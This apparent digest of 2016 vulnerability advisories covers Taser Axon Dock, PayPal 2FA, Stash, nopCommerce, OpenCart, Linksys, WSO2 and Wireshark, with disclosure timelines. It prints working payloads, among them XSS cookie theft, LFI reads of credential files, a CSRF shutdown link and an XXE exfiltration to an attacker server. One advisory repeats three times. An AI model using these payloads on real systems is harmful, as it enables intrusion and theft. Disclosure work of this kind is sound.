Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass
[TITLE] Taser Axon Dock (Body-Worn Camera Docking Station) v3.1 - Authentication Bypass [CREDITS & AUTHORS] Reginald Dodd https://www.linkedin.com/in/reginalddodd [VENDOR & PRODUCT] Taser International Inc. Axon Dock - Body-Worn Camera Docking Station https://www.axon.io/products/dock [SUMMARY] The Axon Dock is the camera docking station component of Taser's body-worn camera system. It charges body-worn cameras and automatically uploads videos to Taser's Evidence.com after body-worn cameras are stored onto it. System owners can remotely manage the dock through a web browser by navigating to http://. Remote unauthenticated users can obtain administrator access and reconfigure the Axon Dock. [DESCRIPTION] The Axon Dock stores its core management files in the http:///lua/ directory. These files are not protected with basic authentication. Remote unauthenticated users can send HTTP POST requests to any of these files: * http:///lua/set-passwd.lua * http:///lua/set-config.lua * http:///lua/reset-reg.lua * http:///lua/etm-reboot.lua * http:///lua/ssl-regen.lua * http:///lua/diag-cmd.lua * http:///lua/dvr-update.lua Once a HTTP POST request with the proper payload body is sent to those files, they will allow remote unauthenticated users to: * Change the password of the default and unchangeable user named "admin". * Change the network configuration. * Reveal body-worn camera owner real names, typically law enforcement officers. * De-register a Axon Dock from Evidence.com to possibly disrupt or dissassociate video uploads. * Reboot a Axon Dock. * Regenerate the SSL certificate * Run Diagnostics on the Axon Dock * Update the firmware of the Axon Dock and any attached cameras * Repair any attached cameras * It was discovered that an intentionally hidden feature could allow users to transfer body-worn camera videos to any ftp server other than evidence.com. The HTML DIV tag of this feature was hidden with CSS (display:none). This feature uses ftp to transfer videos. It is accessible to remote unauthenticated users, as well. The device uses the /lua/set-config.lua file to enable this feature. I created a ftp server to test it. The ftp credentials were sent via the GUI and re-sent several times via Burp Suite. I was able to enable it, but it constantly showed as not being properly configured (red instead of green status). I did not notice any network traffic in wireshark on the ftp port of my ftp server. However, I did not have a body-worn camera available to accurately confirm that this feature does not work. [AFFECTED VERSIONS] Vulnerable Version(s): 3.1.160322.2252 and possibly all prior versions Fixed Version: Version 3.2.160726.1852 [SOLUTION] Taser stated that they would centrally push out version 3.2.160726.1852 to all Axon Docks on August 8, 2016. If your dock is not updated, try to update the dock manually in the firmware section of the remote console. Contact Taser if you have any complications. [TIMELINE] July 18-20,2016 - Discovered and validated with multiple exploits. July 21, 2016 - My findings and exploits were dislosed to Taser. They immediately acknowledged the issues. July 22, 2016 - Taser stated that a fix would be available in 2 weeks. July 31, 2016 - CVE-ID was requested from MITRE August 1, 2016 - MITRE denied the CVE-ID request August 8,2016 - Allegedly, the fix was to be centrally pushed on this day. Although, no docks were updated that were accessible to me. August 12,2016 - Received reports that some docks were updated with the fix. August 13, 2016 - Taser sent a confirmation email stating that "all" docks have been updated with the fix. August 15, 2016 - Public Disclosure.
PayPal Inc BB #127 - 2FA Bypass Vulnerability
Document Title: === PayPal Inc BB #127 - 2FA Bypass Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1903 Release Date: = 2016-08-12 Vulnerability Laboratory ID (VL-ID): 1903 Common Vulnerability Scoring System: 6.2 Product & Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. (Copy of the Homepage: www.paypal.com ) Abstract Advisory Information: == The independent vulnerability laboratory researcher (shawar khan) discovered a vulnerability in the official PayPal website (api) web-application). The issue allows an attacker to bypass the 2-factor authentication and mobile confirmation which could lead to unauthorized access. Vulnerability Disclosure Timeline: == 2016-05-13: Researcher Notification & Coordination (Shawar Khan) 2016-05-14: Vendor Notification (PayPal Inc Bug Bounty Program - Security Team) 2016-05-24: Vendor Response/Feedback (PayPal Inc Bug Bounty Program - Security Team) 2016-07-10: Vendor Fix/Patch (PayPal Inc Developer Team) 2016-07-18: Acknowledgements (PayPal Inc Bug Bounty Program - Security Team) 2016-08-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PayPal Inc Product: PayPal - Online Service Web Application 2016 Q3 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: A 2 Factor Authentication Bypass Vulnerability was discovered in the official PayPal website (api) web-application). This vulnerability allows an attacker to bypass the 2FA mechanism for access to accounts of paypal without verifying in the basic procedure the identity with confirmation. The security vulnerability is located in the paypal login portals of uk and the paypal preview. Each Portal is having an issue which can lead to a full bypass once used in a combined way. If the user have 2FA activated in his account. Whenever an user logs into his account, paypal will ask the user to verify the identity. Verification can be made via phone number or by confirming the login request via paypal mobile app (api). The mechanism mainly prevents unauthorized acccess to the account and provides an extra layer of security. The login portal of paypal preview is missing verification mechanism in it. When an user is logged in via paypal preview's login portal, the user is logged in without any verification and the login is successful but there is no settings or anything of interest. When logged in via paypal uk login portal, it checks if the user account is already signed in from any other portal or not. Once it checks the user is already logged in via paypal preview (without verification) it allows us access to the account without any kind of verification. This is the way how 2FA was bypassed in paypal due to lack of 2FA protection. Proof of Concept (PoC): === PayPal uses an additional layer of security known as 2-Factor Authentication which is used to verify the user's identity so no unauthorized access would be allowed. The mechanism verifies the user's identity by calling or messaging a code to phone number or by confirming the login via Mobile App. Without these, the account will not be accessed. By following the procedure below the 2FA protection can be bypassed: Site: PayPal ( www.paypal.com ) PayPal UK Login Portal: https://www.paypal.com/uk/cgi-bin/?cmd=_email_receipt PayPal Preview Login Portal: https://www.paypal.com/webapps/garden/page/garden.form Steps to reproduce: 1. Open PayPal UK Login Portal in a new tab(keep it open) 2. On the other tab, open PayPal Preview Login Portal 3. Login to your account in the URL which is opened in step 2 4. Enter credentials in the new window which appears 5. Refresh the page which was opened in step 1 6. Now you will be logged, Click on view account button which will lead you to your account and the 2 step verification will be bypassed Solution - Fix & Patch: === In every login portals, verification checks must be deployed even if the user is already logged in. This will prevent unauthorized access to the account. Security Risk: == This vulnerability allows an attacker to bypass the 2-factor authentication and mobile confirmation which could lead to unauthorized access. Credits & Authors: == Shawar Khan - (https://shawarkhan.com) [http://www.vulnerability-lab.com/show.php?user=Shawar%20Khan]
Stash v1.0.3 CMS - SQL Injection Vulnerability
Document Title: === Stash v1.0.3 CMS - SQL Injection Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1899 Release Date: = 2016-08-10 Vulnerability Laboratory ID (VL-ID): 1899 Common Vulnerability Scoring System: 6 Product & Service Introduction: === Stash is a free content management system (CMS). Was written on PHP and uses MySQL. Distributed under The Creative Commons License. Abstract Advisory Information: == The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the official Stash v1.0.3 content management system. Vulnerability Disclosure Timeline: == 2016-08-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Stash Product: Stash - Content Management System (Web-Application) 1.0.3 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system. The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms. The sql-injection vulnerability is located in the `id` parameter of the `./stash/admin/` module GET method request. Remote attackers are able to execute own sql commands by usage of the insecure `usersedit.php` file GET method request. The attack vector of the vulnerability is application-side and the request method to inject is GET. The vulnerability is a classic select remote sql-injection. The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0. Exploitation of the remote sql injection vulnerability requires no user interaction and a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] ./stash/admin/ Vulnerable File(s): [+] usersedit.php Vulnerable Parameter(s): [+] id Proof of Concept (PoC): === The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction. For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue. PoC: Exploitation http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION VULNERABILITY!]-- --- Error Exception Logs [SQL] --- Query error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 --- PoC Session Logs [GET] --- Status: 200[OK] GET http://stash.localhost:8000/stash/admin/usersedit.php?id=-1'[SQL-INJECTION VIA ID PARAMETER!]-- Mime Type[text/html] Request Header: Host[stash.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0] Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470585963.1470585617.; _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fstash.localhost:8000%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*] Connection[keep-alive] Response Header: Server[nginx/1.2.1] Date[Sun, 07 Aug 2016 16:06:03 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1] Reference(s): http://stash.localhost:8000/ http://stash.localhost:8000/stash/ http://stash.localhost:8000/stash/admin/ http://stash.localhost:8000/stash/admin/usersedit.php Solution - Fix & Patch: === The sql-injection web vulnerability in the application can be patched by usage of a prepared statement in the vulnerable usersedit.php file GET method request. Disallow the usage of special chars and escape the input/output context of the module to prevent further sql-injection attacks. Security Risk: == The security risk of the remote sql-injection web vulnerability in the useredit.php file GET method request is estimated as high. (CVSS 6.0) Credits & Authors: == Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: =
Reflected Cross Site Scripting (XSS) Vulnerability in nopcommerce 3.70
Security Advisory
CVE-ID: N/A
Topic: Reflected Cross Site Scripting (XSS) Vulnerability in
"successful registration" page
Class: Input Validation
Severity: Medium
Discovery: 2016-04-28
Vendor Notification:2016-04-28
Vendor response:2016-05-30
Vendor Patch: 2016-05-31
Public Announced: 2016-08-15
Credits:Tal Argoni, CEH from Triad Security [http://www.triadsec.com/]
Affects:nopCommerce, open-source & free e-commerce solution 3.70
Resolved: Version 3.8
I. Background
nopCommerce is open-source e-commerce shopping cart web application
written in MVC.NET. After
anonymous user successfully registered the application, the
application return the user a successful
registration page with "continue to the shop" button. The
redirection's parameter (returnurl) value is
supplied by the user and echo without output validation to the browser.
II. Problem Description
Reflected cross-site scripting vulnerabilities arise when data is
copied from a request and echoed into
the application's immediate response in an unsafe way. The injected
code is not stored within the
application itself; it is only impacts users who open a maliciously
crafted link or third-party web page.
The attack string is included as part of the crafted URI or HTTP
parameters, improperly processed by the
application, and returned to the victim.
Exploit code/POC:
http://VulnopCommerce/registerresult/1?returnurl=%2fcustomer%2finfo'%3balert("hacked+by+triad+s
ecurity")%3b%2f%2f
III. Impact
The attacker-supplied code can perform a wide variety of actions, such
as stealing the victim's session
token or login credentials, performing arbitrary actions on the
victim's behalf, and logging their
keystrokes.
IV. Workaround
You can work around this problem by doing the following:
1. It is recommended to use HTML-encoded at any point where it is
copied into application
responses.
V. Solution
Download vendor patch from http://www.nopcommerce.com .
Update to version 3.8
VI. References
http://www.triadsec.com/
https://www.linkedin.com/in/talargoni
https://github.com/nopSolutions/nopCommerce/commit/364091c16bae533a6c00c0f3bd920ed15da25f
77
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Linksys E2500 and E1200 (Unauth Command Injection)
Linksys E2500 and E1200 suffer from missing command injection issue in parental control parameters. This allows an attacker to change the control the device remotely. Combining the attack of no authorization control, it allows an attacker to actually execute unauthenticated command injection attack and thus control the entire device. More info at: http://www.samuelhuntley.com/?p=141 http://www.samuelhuntley.com/?p=135 Initial disclosure date: 04/12/16 Fixed date as per Linksys contact: 7/4/16 Linksys contact: Benjamin Samuels, Calvin Clark (secur...@linksys.com)
Linksys E1200 and E2500 (Missing authorization on parental control)
Linksys E1200 hardware version 2.2 and firmware version 2.0.07 (build 2) suffer from missing authorization control on parental control page. This allows an attacker to change the parental controls set up by parents to keep kids safe from visiting adult sites and probably compromise a kids device. Info at http://www.samuelhuntley.com/?p=132 http://www.samuelhuntley.com/?p=143 Initial disclosure date: 04/12/16 Fixed date as per Linksys contact: 7/4/16 Linksys contact: Benjamin Samuels, Calvin Clark (secur...@linksys.com)
OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)
###
# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability
###
Information
Author: Hamed Izadi
Email: array("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important
Description
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.
Technical Details
Proof of Concept URLs for XSS in OpenCart v2.0.3.1:
/opencart/index.php?route=product/product_id=1
(product_id - GET)
XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//
Example:
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//
After opening the above URL, click on "Add to Wish List" & "Compare this
Product" icons,
and view the alert window.
Solution
Upgrade to newer version
Credits & Authors
These issues have been discovered by Hamed Izadi
###
# Iran
# L U Arg
###
OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)
###
# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability
###
Information
Author: Hamed Izadi
Email: ("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important
Description
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.
Technical Details
Proof of Concept URLs for XSS in OpenCart v2.0.3.1:
/opencart/index.php?route=product/product_id=1
(product_id - GET)
XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//
Example:
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//
After opening the above URL, click on "Add to Wish List" & "Compare this
Product" icons,
and view the alert window.
Solution
Upgrade to newer version
Credits & Authors
These issues have been discovered by Hamed Izadi
###
# Iran
# L U Arg
###
OpenCart 2.0.3.1 Cross Site Scripting Vulnerability (product_id - GET)
###
# OpenCart 2.0.3.1 Cross Site Scripting Vulnerability
###
Information
Author: Hamed Izadi
Email: ("hamedizadi", "@", "gmail", ".com");
Name: XSS Vulnerability in OpenCart
Affected Software : OpenCart
Affected Versions: v2.0.3.1 and possibly below
Vendor Homepage : http://www.opencart.com
Vulnerability Type : Cross-site Scripting
Severity : Important
Description
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in users session. This means that the malicious hacker can change
the logged in users password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrators session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.
Technical Details
Proof of Concept URLs for XSS in OpenCart v2.0.3.1:
/opencart/index.php?route=product/product_id=1
(product_id - GET)
XSS Payload : %27);window[%27al\u0065rt%27](/XSS/);//
Example:
/opencart/index.php?route=product/product_id=1%27);window[%27al\u0065rt%27](/XSS/);//
After opening the above URL, click on "Add to Wish List" & "Compare this
Product" icons,
and view the alert window.
Solution
Upgrade to newer version
Credits & Authors
These issues have been discovered by Hamed Izadi
###
# Iran
# L U Arg
###
WSO2-CARBON v4.4.5 CSRF / DOS
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
[+] ISR: ApparitionSec
Vendor:
www.wso2.com
Product:
==
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built.
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
Vulnerability Type:
=
Cross Site Request Forgery / DOS
CVE Reference:
==
CVE-2016-4315
Vulnerability Details:
=
The attack involves tricking a privileged user to initiate a request by
clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
The getSafeText() Function and conditional logic below processes the "action"
parameter with no check for inbound CSRF attacks.
String cookie = (String)
session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie,
session);
try {
if ("restart".equals(action)) {
client.restart();
} else if ("restartGracefully".equals(action)) {
client.restartGracefully();
} else if ("shutdown".equals(action)) {
client.shutdown();
} else if ("shutdownGracefully".equals(action)) {
client.shutdownGracefully();
}
} catch (Exception e) {
response.sendError(500, e.getMessage());
return;
}
Exploit code(s):
===
Shutdown the Carbon server
https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut
it down!
Disclosure Timeline:
==
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt [+] ISR: ApparitionSec Vendor: = www.wso2.com Product: == Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: === Persistent / Reflected Cross Site Scripting (XSS) - Cookie Disclosure CVE Reference: == CVE-2016-4316 Vulnerability Details: = WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy, stealing session cookies and used as a platform for further attacks on the system. Exploit code(s) === Persistent XSS: GET Request https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie) Request two is POST /carbon/identity-mgt/challenges-mgt-finish.jsp setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+% 3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS Then XSS payload will be listed here in below URL: https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu Finally when victim clicks to "Delete" entry on the page the XSS is executed. Here is stored payload from the HTML source Delete /// Reflected XSS XSS #1 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E XSS #2 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL XSS #3 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true XSS #4 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server= XSS #5 https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E XSS #6 https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true= Disclosure Timeline: === Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The
WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt [+] ISR: ApparitionSec Vendor: === www.wso2.com Product: Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: = Local File Inclusion (LFI) CVE Reference: == CVE-2016-4314 Vulnerability Details: = An authenticated user can download configuration files in the filesystem via downloadArchivedLogFiles operation in LogViewer admin service. The request to the admin service accepts a file path relative to the carbon log file directory (i.e. /repository/logs) hence can access any file in the file system. References: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098 Example: accessing the registry.xml file via Local File Inclusion exposes the MySQL passwords. mysql-db jdbc:mysql://localhost:3306/regdb regadmin regadmin com.mysql.jdbc.Driver 80 6000 5 Exploit code(s): === LFI to read Database creds, truststore key file, web.xml etc... 1) Read MySQL creds https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml== 2) Read MySQL creds https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml 3) Access Truststore Key file. https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks 4) Read web.xml https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml Disclosure Timeline: === Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
[+] ISR: ApparitionSec
Vendor:
=
www.wso2.com
Product:
Wso2 Identity Server v5.1.0
As the industrys first enterprise identity bus (EIB), WSO2 Identity Server is
the central backbone
that connects and manages multiple identities across applications, APIs, the
cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to
propagate identities across geographical
and enterprise borders in a connected business environment.
Vulnerability Type:
XML External Entity / CSRF
CVE Reference(s):
===
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)
Vulnerability Details:
=
WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can be
exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.
The exploit can be carried out locally by an internal malicious user or remote
via CSRF if an authenticated user clicks an attacker
supplied link or visits a evil webpage. In case of WSO2IS system files can be
read / exfiltrated to the remote attackers server
for safe keeping -_-
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096
Exploit code(s):
===
XXE POC, exfiltrate the victims Windows hosts file to our remote server.
1) Form for the XXE POST request.
https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false;
method="post">
http://attackserver:8080/payload.dtd;>
%dtd;]>
document.getElementById('XXE').submit()
2) DTD file on attacker server.
http://attackserver:8080?%file;'>">
%all;
3) On attack server create listener for the victims HTTP request.
python -m SimpleHTTPServer 8080
Disclosure Timeline:
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
===
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
[SECURITY] [DSA 3648-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-3648-1 secur...@debian.org https://www.debian.org/security/ Moritz Muehlenhoff August 12, 2016 https://www.debian.org/security/faq - - Package: wireshark CVE ID : CVE-2016-6504 CVE-2016-6505 CVE-2016-6506 CVE-2016-6507 CVE-2016-6508 CVE-2016-6509 CVE-2016-6510 CVE-2016-6511 Multiple vulnerabilities were discovered in the dissectors for NDS, PacketBB, WSP, MMSE, RLC, LDSS, RLC and OpenFlow, which could result in denial of service or the execution of arbitrary code. For the stable distribution (jessie), these problems have been fixed in version 1.12.1+g01b65bf-4+deb8u8. For the testing distribution (stretch), these problems have been fixed in version 2.0.5+ga3be9c6-1. For the unstable distribution (sid), these problems have been fixed in version 2.0.5+ga3be9c6-1. We recommend that you upgrade your wireshark packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJXriWXAAoJEBDCk7bDfE42vn0QAKQSyQoWuCxhCJuS4iASaeef OCT1ai3/s8LG4yEZBKC6oSbsgKU7uqJO3cmb7U5x3BDmcdow3h7PYeTBlHf5rvpK d0/HIN1Q/NMrkf1BQKJckqgNhDMzrgHonpyhi/Yidjgu+/CrUgMYeZhm563cn3Ni yUvNdKQZ42yowEd6uhVNUifn4Pg1/h+x6LuPjvtiggcbEGLHnXzdmtoqwh27AhP0 Up3e+QO8N7P9/mCnB27Sm5whQXlNYem/zsIMsk0KVzXsEz7cBOm+GtrI4VsSlAc3 RtGSTkdAwAGi5i1l7fk3RAvOpLDy2KfgxxBR3fTv9KHgEu1EPpoFPIUdLgoEESlT bs2B+zmNmOfktPjfh7r5JCeaWa+A0l07tP6CyYDqq4xP4IhiqShuGXz+/twoYMlg NucTs04UlZVW3cayjGtiGc+8mnkdBohclrkaQjwyhv8ltnxGHfHoZHGNF7smOiVV 